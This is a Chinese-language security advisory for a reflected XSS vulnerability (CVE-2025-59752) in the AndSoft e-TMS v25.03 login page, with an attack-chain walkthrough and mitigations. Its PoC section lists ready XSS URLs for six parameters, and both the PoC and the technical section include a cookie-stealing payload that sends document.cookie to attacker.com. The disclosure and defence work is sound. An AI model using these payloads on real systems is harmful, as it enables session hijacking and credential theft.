CVE-2025-59752：AndSoft e-TMS 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59752

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59752是AndSoft公司开发的e-TMS（运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，CVSS 3.1评分为6.1分，属于中危级别漏洞。

e-TMS是一款广泛应用于物流和运输行业的管理系统，用于处理运输订单、车辆调度、物流跟踪等业务。该系统通常部署在企业内部网络中，但由于其Web界面的特性，攻击者可以通过构造恶意URL来利用此漏洞。

该漏洞位于e-TMS的登录页面（/clt/LOGINFRM_LXA.ASP），涉及多个参数未经过充分过滤和转义处理。具体来说，'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'这六个参数都存在XSS注入风险。攻击者可以通过精心构造包含恶意JavaScript代码的URL，诱使受害者点击，从而在受害者的浏览器上下文中执行任意JavaScript代码。

由于该漏洞的CVSS向量表明无需认证（PR:N）即可利用，但需要用户交互（UI:R），因此攻击者通常需要通过钓鱼邮件、即时消息或其他社交工程手段来诱导受害者点击恶意链接。一旦成功利用，攻击者可以窃取用户的会话cookie、劫持用户会话、进行钓鱼攻击或在受害者浏览器中执行其他恶意操作。

此漏洞的CVSS评分为6.1分，反映出其对机密性和完整性有低影响，但对可用性无影响。由于涉及多个参数同时存在相同类型的漏洞，攻击面相对较广，需要引起足够重视。

技术细节

该漏洞是一个典型的反射型XSS漏洞，根本原因在于AndSoft e-TMS v25.03的登录页面（/clt/LOGINFRM_LXA.ASP）对用户输入的参数缺乏充分的过滤和HTML实体编码处理。

漏洞原理：
1. 应用程序接收用户通过URL参数传递的输入（如l、demo、demo2、TNTLOGIN、UO、SuppConn等参数）
2. 服务器端直接将接收到的参数值嵌入到返回的HTML页面中，未进行适当的输出编码
3. 攻击者可以在参数值中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）
4. 当受害者访问包含恶意参数的URL时，服务器返回的页面中会包含并执行攻击者注入的脚本

利用方式：
攻击者构造一个包含恶意JavaScript代码的URL，例如：
https://target.com/clt/LOGINFRM_LXA.ASP?l=<script>alert('XSS')</script>

或者利用其他受影响的参数：
https://target.com/clt/LOGINFRM_LXA.ASP?demo=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

攻击者通常通过以下步骤实施攻击：
1. 构造包含恶意JavaScript的URL
2. 通过钓鱼邮件或社交工程手段发送给目标用户
3. 诱使受害者点击恶意链接
4. 恶意脚本在受害者浏览器中执行，可窃取会话cookie、重定向到钓鱼页面或执行其他恶意操作

由于该漏洞影响多个参数，攻击者可以根据目标系统的具体配置选择最有效的注入点，增加了利用的灵活性。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统是否运行AndSoft e-TMS v25.03版本，并定位登录页面/clt/LOGINFRM_LXA.ASP的访问入口。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript代码的URL，利用l、demo、demo2、TNTLOGIN、UO或SuppConn等未过滤的参数注入XSS payload。

STEP 3

步骤3：社工诱导

攻击者通过钓鱼邮件、即时消息或其他社交工程手段，将恶意URL发送给目标用户，诱使其点击。

STEP 4

步骤4：触发漏洞

受害者在浏览器中访问恶意URL，服务器将未经过滤的参数值直接嵌入HTML响应中返回。

STEP 5

步骤5：恶意脚本执行

浏览器解析返回的HTML并执行其中嵌入的恶意JavaScript代码，攻击者可在受害者会话上下文中执行任意操作。

STEP 6

步骤6：数据窃取或进一步攻击

恶意脚本窃取用户的会话cookie、会话令牌或其他敏感信息，或将用户重定向到钓鱼页面进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Reflected XSS PoC for CVE-2025-59752 -->
<!-- Affected file: /clt/LOGINFRM_LXA.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- Basic XSS test using 'l' parameter -->
https://target.com/clt/LOGINFRM_LXA.ASP?l=<script>alert('XSS-CVE-2025-59752')</script>

<!-- XSS test using 'demo' parameter -->
https://target.com/clt/LOGINFRM_LXA.ASP?demo=<script>alert('XSS')</script>

<!-- XSS test using 'demo2' parameter -->
https://target.com/clt/LOGINFRM_LXA.ASP?demo2=<script>alert('XSS')</script>

<!-- XSS test using 'TNTLOGIN' parameter -->
https://target.com/clt/LOGINFRM_LXA.ASP?TNTLOGIN=<script>alert('XSS')</script>

<!-- XSS test using 'UO' parameter -->
https://target.com/clt/LOGINFRM_LXA.ASP?UO=<script>alert('XSS')</script>

<!-- XSS test using 'SuppConn' parameter -->
https://target.com/clt/LOGINFRM_LXA.ASP?SuppConn=<script>alert('XSS')</script>

<!-- Cookie stealing PoC (for demonstration purposes only) -->
<!-- Replace 'attacker.com' with actual attacker-controlled domain -->
https://target.com/clt/LOGINFRM_LXA.ASP?l=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

<!-- Using img tag for XSS (alternative payload) -->
https://target.com/clt/LOGINFRM_LXA.ASP?l=<img src=x onerror=alert('XSS')>

<!-- Using svg tag for XSS (alternative payload) -->
https://target.com/clt/LOGINFRM_LXA.ASP?l=<svg onload=alert('XSS')>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）部署Web应用防火墙（WAF）规则，检测和阻止包含常见XSS payload的请求；2）在Web服务器层面配置URL过滤规则，限制对/clt/LOGINFRM_LXA.ASP页面的可疑参数访问；3）实施Content Security Policy（CSP）头，限制页面中JavaScript的执行；4）加强用户安全意识培训，警惕可疑链接；5）监控Web服务器日志，及时发现异常访问行为；6）将会话cookie设置为HttpOnly属性，降低cookie被窃取的风险。